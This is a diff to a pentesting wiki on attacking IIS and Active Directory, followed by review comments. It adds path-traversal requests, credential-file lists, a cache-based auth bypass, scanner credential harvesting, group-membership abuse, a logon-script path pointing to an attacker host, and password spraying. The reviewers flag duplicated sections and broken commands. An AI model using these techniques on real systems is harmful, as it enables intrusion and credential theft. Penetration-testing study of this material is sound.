diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md index d64a189e055..c450d84e02d 100644 --- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -2,6 +2,39 @@ {{#include ../../banners/hacktricks-training.md}} +Test executable file extensions: + +- asp +- aspx +- config +- php + +## Internal IP Address disclosure + +On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address: + +``` +nc -v domain.com 80 +openssl s_client -connect domain.com:443 +``` + +Response disclosing the internal IP: + +``` +GET / HTTP/1.0 + +HTTP/1.1 302 Moved Temporarily +Cache-Control: no-cache +Pragma: no-cache +Location: https://192.168.5.237/owa/ +Server: Microsoft-IIS/10.0 +X-FEServer: NHEXCHANGE2016 +``` + +# IIS - Internet Information Services + + + Test executable file extensions: - asp 
@@ -37,6 +70,281 @@ You can upload .config files and use them to execute code. One way to do it is a More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/) +## Decrypt encrypted configuration and ASP.NET Core Data Protection key rings + +Two common patterns to protect secrets on IIS-hosted .NET apps are: +- ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) for web.config sections like . +- ASP.NET Core Data Protection key ring (persisted locally) used to protect application secrets and cookies. + +If you have filesystem or interactive access on the web server, co-located keys often allow decryption. + +- ASP.NET (Full Framework) – decrypt protected config sections with aspnet_regiis: + +```cmd +# Decrypt a section by app path (site configured in IIS) +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pd "connectionStrings" -app "/MyApplication" + +# Or specify the physical path (-pef/-pdf write/read to a config file under a dir) +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\MyApplication" +``` + +- ASP.NET Core – look for Data Protection key rings stored locally (XML/JSON files) under locations like: + - %PROGRAMDATA%\Microsoft\ASP.NET\DataProtection-Keys + - HKLM\SOFTWARE\Microsoft\ASP.NET\Core\DataProtection-Keys (registry) + - App-managed folder (e.g., App_Data\keys or a Keys directory next to the app) + +With the key ring available, an operator running in the app’s identity can instantiate an IDataProtector with the same purposes and unprotect stored secrets. Misconfigurations that store the key ring with the app files make offline decryption trivial once the host is compromised. 
+ +References: +- Microsoft Learn – Protected Configuration (aspnet_regiis -pe/-pd/-pef/-pdf) +- Microsoft Learn – ASP.NET Core Data Protection configuration and key storage + +## IIS Discovery Bruteforce + +Download the list that I have created: + +{{#file}} +iisfinal.txt +{{#endfile}} + +It was created merging the contents of the following lists: + +[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\ +[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\ +[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\ +[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\ +[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\ +[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt) + +Use it without adding any extension, the files that need it have it already. 
+ +## Path Traversal + +### Leaking source code + +Check the full writeup in: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html) + +> [!TIP] +> As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\ +> From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\ +> Also, the files **connectionstrings.config** and **global.asax** may contain interesting information. + +In **.Net MVC applications**, the **web.config** file plays a crucial role by specifying each binary file the application relies on through **"assemblyIdentity"** XML tags. + +### **Exploring Binary Files** + +An example of accessing the **web.config** file is shown below: + +```html +GET /download_page?id=..%2f..%2fweb.config HTTP/1.1 +Host: example-mvc-application.minded +``` + +This request reveals various settings and dependencies, such as: + +- **EntityFramework** version +- **AppSettings** for webpages, client validation, and JavaScript +- **System.web** configurations for authentication and runtime +- **System.webServer** modules settings +- **Runtime** assembly bindings for numerous libraries like **Microsoft.Owin**, **Newtonsoft.Json**, and **System.Web.Mvc** + +These settings indicate that certain files, such as **/bin/WebGrease.dll**, are located within the application's /bin folder. + +### **Root Directory Files** + +Files found in the root directory, like **/global.asax** and **/connectionstrings.config** (which contains sensitive passwords), are essential for the application's configuration and operation. 
+ +### **Namespaces and Web.Config** + +MVC applications also define additional **web.config files** for specific namespaces to avoid repetitive declarations in each file, as demonstrated with a request to download another **web.config**: + +```html +GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1 +Host: example-mvc-application.minded +``` + +### **Downloading DLLs** + +The mention of a custom namespace hints at a DLL named "**WebApplication1**" present in the /bin directory. Following this, a request to download the **WebApplication1.dll** is shown: + +```html +GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1 +Host: example-mvc-application.minded +``` + +This suggests the presence of other essential DLLs, like **System.Web.Mvc.dll** and **System.Web.Optimization.dll**, in the /bin directory. + +In a scenario where a DLL imports a namespace called **WebApplication1.Areas.Minded**, an attacker might infer the existence of other web.config files in predictable paths, such as **/area-name/Views/**, containing specific configurations and references to other DLLs in the /bin folder. For example, a request to **/Minded/Views/web.config** can reveal configurations and namespaces that indicate the presence of another DLL, **WebApplication1.AdditionalFeatures.dll**. 
+ +### Common files + +From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) + +``` +C:\Apache\conf\httpd.conf +C:\Apache\logs\access.log +C:\Apache\logs\error.log +C:\Apache2\conf\httpd.conf +C:\Apache2\logs\access.log +C:\Apache2\logs\error.log +C:\Apache22\conf\httpd.conf +C:\Apache22\logs\access.log +C:\Apache22\logs\error.log +C:\Apache24\conf\httpd.conf +C:\Apache24\logs\access.log +C:\Apache24\logs\error.log +C:\Documents and Settings\Administrator\NTUser.dat +C:\php\php.ini +C:\php4\php.ini +C:\php5\php.ini +C:\php7\php.ini +C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf +C:\Program Files (x86)\Apache Group\Apache\logs\access.log +C:\Program Files (x86)\Apache Group\Apache\logs\error.log +C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf +C:\Program Files (x86)\Apache Group\Apache2\logs\access.log +C:\Program Files (x86)\Apache Group\Apache2\logs\error.log +c:\Program Files (x86)\php\php.ini" +C:\Program Files\Apache Group\Apache\conf\httpd.conf +C:\Program Files\Apache Group\Apache\conf\logs\access.log +C:\Program Files\Apache Group\Apache\conf\logs\error.log +C:\Program Files\Apache Group\Apache2\conf\httpd.conf +C:\Program Files\Apache Group\Apache2\conf\logs\access.log +C:\Program Files\Apache Group\Apache2\conf\logs\error.log +C:\Program Files\FileZilla Server\FileZilla Server.xml +C:\Program Files\MySQL\my.cnf +C:\Program Files\MySQL\my.ini +C:\Program Files\MySQL\MySQL Server 5.0\my.cnf +C:\Program Files\MySQL\MySQL Server 5.0\my.ini +C:\Program Files\MySQL\MySQL Server 5.1\my.cnf +C:\Program Files\MySQL\MySQL Server 5.1\my.ini +C:\Program Files\MySQL\MySQL Server 5.5\my.cnf +C:\Program Files\MySQL\MySQL Server 5.5\my.ini +C:\Program Files\MySQL\MySQL Server 5.6\my.cnf +C:\Program Files\MySQL\MySQL Server 5.6\my.ini +C:\Program Files\MySQL\MySQL Server 5.7\my.cnf +C:\Program Files\MySQL\MySQL Server 5.7\my.ini +C:\Program Files\php\php.ini +C:\Users\Administrator\NTUser.dat 
+C:\Windows\debug\NetSetup.LOG +C:\Windows\Panther\Unattend\Unattended.xml +C:\Windows\Panther\Unattended.xml +C:\Windows\php.ini +C:\Windows\repair\SAM +C:\Windows\repair\system +C:\Windows\System32\config\AppEvent.evt +C:\Windows\System32\config\RegBack\SAM +C:\Windows\System32\config\RegBack\system +C:\Windows\System32\config\SAM +C:\Windows\System32\config\SecEvent.evt +C:\Windows\System32\config\SysEvent.evt +C:\Windows\System32\config\SYSTEM +C:\Windows\System32\drivers\etc\hosts +C:\Windows\System32\winevt\Logs\Application.evtx +C:\Windows\System32\winevt\Logs\Security.evtx +C:\Windows\System32\winevt\Logs\System.evtx +C:\Windows\win.ini +C:\xampp\apache\conf\extra\httpd-xampp.conf +C:\xampp\apache\conf\httpd.conf +C:\xampp\apache\logs\access.log +C:\xampp\apache\logs\error.log +C:\xampp\FileZillaFTP\FileZilla Server.xml +C:\xampp\MercuryMail\MERCURY.INI +C:\xampp\mysql\bin\my.ini +C:\xampp\php\php.ini +C:\xampp\security\webdav.htpasswd +C:\xampp\sendmail\sendmail.ini +C:\xampp\tomcat\conf\server.xml +``` + +## HTTPAPI 2.0 404 Error + +If you see an error like the following one: + +![](<../../images/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>) + +It means that the server **didn't receive the correct domain name** inside the Host header.\ +In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. 
+ +## Old IIS vulnerabilities worth looking for + +### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure + +You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\ +The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files. + +You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/` + +![](<../../images/image (844).png>) + +Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf) + +You can also use **metasploit**: `use scanner/http/iis_shortname_scanner` + +A nice idea to **find the final name** of the discovered files is to **ask LLMs** for options like it's done in the script [https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py](https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py) + +### Basic Authentication bypass + +**Bypass** a basic authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php` + +You can try to **mix** this **vulnerability** and the last one to find new **folders** and **bypass** the authentication. + +## ASP.NET Trace.AXD enabled debugging + +ASP.NET include a debugging mode and its file is called `trace.axd`. + +It keeps a very detailed log of all requests made to an application over a period of time. 
+ +This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords. + +[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/) + +![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png) + +## ASPXAUTH Cookie + +ASPXAUTH uses the following info: + +- **`validationKey`** (string): hex-encoded key to use for signature validation. +- **`decryptionMethod`** (string): (default “AES”). +- **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros). +- **`decryptionKey`** (string): hex-encoded key to use for decryption. + +However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to us**e the cookie from the second server in the first one** and impersonate the user.\ +This attacked worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19). + +## IIS Authentication Bypass with cached passwords (CVE-2022-30209) + +[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): A bug in the code **didn't properly check for the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user . 
+ +```python +# script for sanity check +> type test.py +def HashString(password): + j = 0 + for c in map(ord, password): + j = c + (101*j)&0xffffffff + return j + +assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT') + +# before the successful login +> curl -I -su 'orange:ZeeiJT' 'http:///protected/' | findstr HTTP +HTTP/1.1 401 Unauthorized + +# after the successful login +> curl -I -su 'orange:ZeeiJT' 'http:///protected/' | findstr HTTP +HTTP/1.1 200 OK +``` + +## References + +- [Walkthrough: Encrypting Configuration Information Using Protected Configuration](https://learn.microsoft.com/en-us/previous-versions/aspnet/dtkwfdky(v=vs.100)) +- [Configure ASP.NET Core Data Protection](https://learn.microsoft.com/en-us/aspnet/core/security/data-protection/configuration/overview) +- [HTB: Sweep — Lansweeper credential interception and AD ACL abuse to Domain Admin](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) + + + ## IIS Discovery Bruteforce Download the list that I have created: diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md index 358f08bf060..96078bc28fd 100644 --- a/src/windows-hardening/active-directory-methodology/README.md +++ b/src/windows-hardening/active-directory-methodology/README.md 
@@ -240,6 +240,26 @@ If you can **access other PCs or shares** you could **place files** (like a SCF ../ntlm/places-to-steal-ntlm-creds.md {{#endref}} +### Abusing discovery/management scanners to harvest credentials + +Enterprise inventory and scanning platforms often authenticate to targets using stored credentials. If you can define scan targets, point one to an attacker-controlled host/service and run a honeypot to capture the attempted authentication. + +Example for SSH: +- Run an SSH honeypot (e.g., sshesame) on a reachable port. +- In the scanner, create a target pointing to your host:port and map a stored SSH credential to it. +- Trigger the scan and collect the username/password from the honeypot logs. + +This pattern generalizes to any active scanner/ITAM that performs authenticated checks against operator-defined targets. + +### Abusing remote deployment features for SYSTEM execution + +Many IT asset/patching tools support push deployments. With sufficient portal privileges, create or edit a deployment package to run arbitrary commands on an enrolled agent or remote host. These jobs frequently execute as a high-privileged service account or LocalSystem, yielding local privilege escalation and lateral movement. + +- Create a new package with a simple command (e.g., add a user, run PowerShell, drop an agent) and deploy it to a test target. +- Preferred transport depends on the product (agent channel, SMB/ADMIN$, WinRM). Adjust firewall/AV evasion accordingly. + +Hygiene: treat these features like remote admin. Least privilege and approvals limit impact. + ### CVE-2021-1675/CVE-2021-34527 PrintNightmare This vulnerability allowed any authenticated user to **compromise the domain controller**. 
@@ -249,7 +269,6 @@ This vulnerability allowed any authenticated user to **compromise the domain con printnightmare.md {{#endref}} -## Privilege escalation on Active Directory WITH privileged credentials/session **For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.** @@ -807,5 +826,7 @@ https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-move - [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) - [https://www.labofapenetrationtester.com/2018/10/deploy-deception.html](https://www.labofapenetrationtester.com/2018/10/deploy-deception.html) - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain) +- [sshesame – SSH honeypot](https://github.com/jaksi/sshesame) +- [HTB: Sweep — Lansweeper credential interception and AD ACL abuse to Domain Admin](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md index ac81ea7d1d4..370e4149486 100644 --- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md +++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md 
@@ -42,6 +42,31 @@ Add-ADGroupMember -Identity "domain admins" -Members spotless Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local" ``` +### Escalate remote access via privileged local groups + +GenericAll over built-in local groups that gate remote access lets you pivot without full DA. Common targets: + +- Remote Management Users → WinRM access (5985/5986) +- Remote Desktop Users → RDP logon +- Administrators → Full local admin on the target(s) + +Examples: + +```bash +# Windows PowerShell +Add-ADGroupMember -Identity "Remote Management Users" -Members spotless -Verbose + +# Linux (BloodyAD) +python3 bloodyAD.py -d FABRIKAM.LOCAL -u bob -p 'P@ssw0rd!' \ + add groupMember 'CN=Remote Management Users,CN=Builtin,DC=fabrikam,DC=local' bob +``` + +Note: Built-in local groups live under `CN=Builtin,DC=...`. After adding yourself, try WinRM: + +```bash +evil-winrm -i -u FABRIKAM\\bob -p 'P@ssw0rd!' +``` + ## **GenericAll / GenericWrite / Write on Computer/User** Holding these privileges on a computer object or a user account allows for: @@ -106,7 +131,7 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico This permission allows an attacker to modify user properties. Specifically, with `GenericWrite` access, the attacker can change the logon script path of a user to execute a malicious script upon user logon. This is achieved by using the `Set-ADObject` command to update the `scriptpath` property of the target user to point to the attacker's script. ```bash -Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1" +Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\\totallyLegitScript.ps1" ``` ## **GenericWrite on Group** 
@@ -206,8 +231,8 @@ Furthermore, additional methods for executing code or maintaining persistence, s - [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2) - [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) - [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658) -- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule\_\_ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_) - -{{#include ../../../banners/hacktricks-training.md}} - +- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_) +- 
[BloodyAD](https://github.com/CravateRouge/bloodyAD) +- [HTB: Sweep — Lansweeper credential interception and AD ACL abuse to Domain Admin](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md index bd408ae7d97..59a128e453a 100644 --- a/src/windows-hardening/active-directory-methodology/password-spraying.md +++ b/src/windows-hardening/active-directory-methodology/password-spraying.md @@ -53,6 +53,23 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman ``` +#### Kerberos time sync and fast "user:user" spray + +Kerberos is time sensitive. If your host clock differs from the KDC beyond the allowed skew, you will see failures like KRB_AP_ERR_SKEW and miss valid hits. Always sync time before Kerberos-based spraying: + +```bash +# Linux +sudo ntpdate || sudo chronyc -a makestep +# Windows +w32tm /resync /nowait +``` + +A quick low-noise check that often finds weak accounts is a username=password spray. Example with kerbrute: + +```bash +./kerbrute_linux_amd64 passwordspray -d EXAMPLE.LOCAL --dc dc01.example.local users.txt {user} +``` + - [**spray**](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_ ```bash 
@@ -226,6 +243,8 @@ To use any of these tools, you need a user list and a password / a small list of - [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell) - [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296) - [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying) +- [MIT Kerberos – clockskew](https://web.mit.edu/kerberos/krb5-latest/doc/admin/conf_files/krb5_conf.html#clockskew) +- [HTB: Sweep — Lansweeper credential interception and AD ACL abuse to Domain Admin](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file
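Review bot: In the first hunk of iis-internet-information-services.md, the inserted block ends with a second `# IIS - Internet Information Services` heading followed by a fresh copy of the "Test executable file extensions" list, while the original list is still present as the unchanged context immediately after the hunk, so the page title ends up below a new section and the extension list appears twice. Suggest keeping the H1 as the first heading after the banner include and adding only the "Internal IP Address disclosure" section after the existing list. Also, the fenced block labelled "Response disclosing the internal IP" contains the request line `GET / HTTP/1.0` together with the response; label it as request followed by response so readers know which part they type and which part they inspect for the `Location` header.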
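Review bot: The second hunk of iis-internet-information-services.md re-adds the entire remainder of the page (IIS Discovery Bruteforce, Path Traversal, Common files, HTTPAPI 2.0 404 Error, Old IIS vulnerabilities, Trace.AXD, ASPXAUTH, CVE-2022-30209 and References) as new `+` lines while the original sections remain as unchanged context starting at `## IIS Discovery Bruteforce` right after the hunk, so the file would carry every section twice. The intended addition appears to be only the "Decrypt encrypted configuration and ASP.NET Core Data Protection key rings" section plus the two new entries under `## References`; please rebase so only those lines are added. Within the new section: the phrase "for web.config sections like ." has lost its element name (an unescaped XML tag swallowed by the renderer), so wrap it in backticks; the `cmd` block uses `#` for comments, which cmd.exe does not treat as a comment, so use `REM` or `::`; the inline "References:" list duplicates the page-level `## References` section and can go; and the registry location given for the Data Protection key ring is not cited anywhere in the hunk, so verify it against the linked Microsoft Learn configuration page before publishing.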
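Review bot: In the active-directory-methodology hunk adding "Abusing discovery/management scanners to harvest credentials" and "Abusing remote deployment features for SYSTEM execution", the text never names the product the referenced write-up covers (the new reference entry is about Lansweeper), so readers cannot map "create a target", "map a stored SSH credential" or "deployment package" to a concrete feature; name the product and link the write-up inline. The closing "Hygiene" line is thin for the impact described: stored scan credentials should be unique, low-privilege accounts rather than reusable admin passwords, the rights to define scan targets and deployment packages should be restricted and approved, and changes to targets, credential mappings and packages should be logged and alerted on, since the sequence the section describes (a new target pointing at an unknown host followed by an authentication attempt from the scanner) is exactly what a defender can detect. The bullet "Adjust firewall/AV evasion accordingly" adds nothing concrete to the page and could be dropped.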
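Review bot: The hunk at `@@ -249,7 +269,6` removes the `## Privilege escalation on Active Directory WITH privileged credentials/session` heading without a replacement, leaving the bold sentence "For the following techniques a regular domain user is not enough..." and every section under it attached to the preceding PrintNightmare subsection, and breaking any links to that heading's anchor. This looks accidental; please restore the heading.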
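Review bot: The two reference entries added at the end of active-directory-methodology/README.md use descriptive titles as link text while every neighbouring entry uses the bare URL as the link text; match the surrounding style, or apply the titled style consistently across the pages this PR touches. The links themselves are fine.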
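Review bot: In the acl-persistence-abuse hunk "Escalate remote access via privileged local groups", the groups listed (Remote Management Users, Remote Desktop Users, Administrators under `CN=Builtin,DC=...`) are the domain's Builtin container groups, which govern access on domain controllers; the local groups of member servers are not directory objects and cannot be reached through an ACE in AD. Reword "built-in local groups" and the "Full local admin on the target(s)" bullet so the scope is clear. The first code block is fenced as `bash` but its first command is PowerShell; split it into a `powershell` fence and a `bash` fence. The final `evil-winrm -i -u FABRIKAM\\bob` line has no host argument after `-i` (a placeholder was probably stripped); add an explicit `<target>` placeholder so the command is not copied as-is.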
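Review bot: The hunk at `@@ -106,7 +131,7` changes the UNC path in the `Set-ADObject` example from `\\10.0.0.5\totallyLegitScript.ps1` to `\\10.0.0.5\\totallyLegitScript.ps1`. PowerShell does not use backslash as an escape character inside double-quoted strings, so the original was correct and the new value writes a malformed path with an empty component into `scriptpath`. Revert this change.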
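Review bot: In the references hunk of acl-persistence-abuse/README.md (`@@ -206,8 +231,8`), the banner include is moved directly under the last list item with no blank line, and the file now ends with `\ No newline at end of file`; keep the blank line before `{{#include ...}}` and the trailing newline, matching the layout visible in the other pages of this diff. The new BloodyAD and write-up entries are fine.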
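Review bot: In the password-spraying hunk adding "Kerberos time sync and fast user:user spray", the new `####` heading and its two code blocks are inserted between the kerbrute block and the `- [**spray**]` list item, splitting the tool list; move the section after the list or fold it into a list item. In the time-sync block, `sudo ntpdate` has no server argument (a placeholder was probably stripped), so it fails with a usage error and the `||` always falls through to chronyc; write `sudo ntpdate <dc-ip>`, and note that `-a` on `chronyc` is deprecated and can be dropped. In the spray example, `{user}` is presented as a kerbrute placeholder, but nothing in the hunk shows kerbrute expanding it; kerbrute's `passwordspray` command provides `--user-as-pass` for exactly this case, so use that or verify the syntax against the tool's help output before publishing.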
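Review bot: The final hunk of password-spraying.md adds the MIT Kerberos clockskew and write-up references correctly, but it also rewrites the banner include line only to drop the file's trailing newline (`\ No newline at end of file`). Restore the newline so the include line stays unchanged in the diff.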